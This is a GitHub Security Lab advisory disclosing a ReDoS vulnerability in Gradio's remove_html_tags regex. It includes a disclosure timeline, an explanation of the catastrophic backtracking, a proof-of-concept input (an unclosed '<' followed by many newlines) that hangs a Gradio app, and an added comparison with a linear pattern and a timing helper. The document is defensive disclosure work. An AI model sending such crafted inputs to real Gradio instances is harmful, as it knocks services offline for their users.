Coordinated Disclosure Timeline
- 2024-10-07: Reported via PVR: https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m
- 2025-01-09: Asked for an update.
- 2025-01-15: No response on https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m, so I posted a public PR with the fix: https://github.com/gradio-app/gradio/pull/10368
Summary
remove_html_tags uses a regex that has a ReDoS vulnerability.
Project
gradio
Tested Version
Details
ReDoS in remove_html_tags (GHSL-2024-273)
The HTML_TAG_RE regex, which is used by remove_html_tags, contains a ReDoS vulnerability:

```python
HTML_TAG_RE = re.compile("<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)
```

The character class [^>] already matches a newline, so the repeated group (?:\n[^>]*?)* can only re-consume characters the preceding [^>]*? could have taken. A run of newlines can therefore be split between the two in exponentially many ways, and when no closing > follows, the engine tries all of them before the match fails.
Proof of concept:
If you start gradio like this, it gets stuck in a very long running loop:

```python
import gradio as gr


def greet(name, intensity):
    return "Hello " * intensity + name + "!"


demo = gr.Interface(
    fn=greet,
    inputs=["text", "slider"],
    outputs=["text"],
    # An unclosed "<" followed by many newlines: the description is passed
    # through remove_html_tags, where HTML_TAG_RE backtracks exponentially.
    description="<" + "\n" * 100,
)
demo.launch()
```
This vulnerability may also lead to a DoS of the Gradio playground via specially crafted code.
This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.
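The following added example (not code from the advisory or from the Gradio project) places the advisory's pattern beside an unambiguous regex that accepts exactly the same language, and provides a small timing helper so the difference in backtracking behaviour can be observed on the input shape above. The hardened pattern and the remove_html_tags wrapper here are assumptions for illustration, not the fix merged in the project.

```python
import re
import time

# Pattern quoted in the advisory. `[^>]` already matches "\n", so the group
# `(?:\n[^>]*?)*` only re-matches what the preceding class could have eaten:
# a run of newlines can be split between them in exponentially many ways,
# and an input with no closing ">" forces the engine to try all of them.
HTML_TAG_RE_VULNERABLE = re.compile(r"<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)

# Assumed hardened form (not the project's own fix): one repetition of the
# same class accepts the same strings but backtracks linearly on failure.
HTML_TAG_RE_FIXED = re.compile(r"<[^>]*>", re.DOTALL)


def remove_html_tags(text: str, pattern: re.Pattern = HTML_TAG_RE_FIXED) -> str:
    """Strip anything that looks like an HTML tag using `pattern`
    (assumed behaviour of the helper named in the advisory)."""
    return pattern.sub("", text)


def crafted_input(n: int) -> str:
    """The advisory's trigger shape: an unclosed '<' followed by n newlines."""
    return "<" + "\n" * n


def seconds_to_search(pattern: re.Pattern, text: str) -> float:
    """Wall-clock seconds for one search; lets the growth with n be compared."""
    start = time.perf_counter()
    pattern.search(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Constructed benign sample: both patterns remove exactly the same tags.
    sample = "<b>Hello</b>\n<span\nclass='x'>world</span> a<b"
    assert remove_html_tags(sample, HTML_TAG_RE_VULNERABLE) == remove_html_tags(sample)

    # Vulnerable pattern: work roughly doubles with each extra newline.
    for n in (10, 14, 18):
        print(f"vulnerable n={n}: {seconds_to_search(HTML_TAG_RE_VULNERABLE, crafted_input(n)):.4f}s")

    # Hardened pattern: linear, so a far larger input is still instantaneous.
    print(f"fixed n=100000: {seconds_to_search(HTML_TAG_RE_FIXED, crafted_input(100_000)):.4f}s")
```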
Impact
This issue may lead to denial of service.
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-273 in any communication regarding this issue.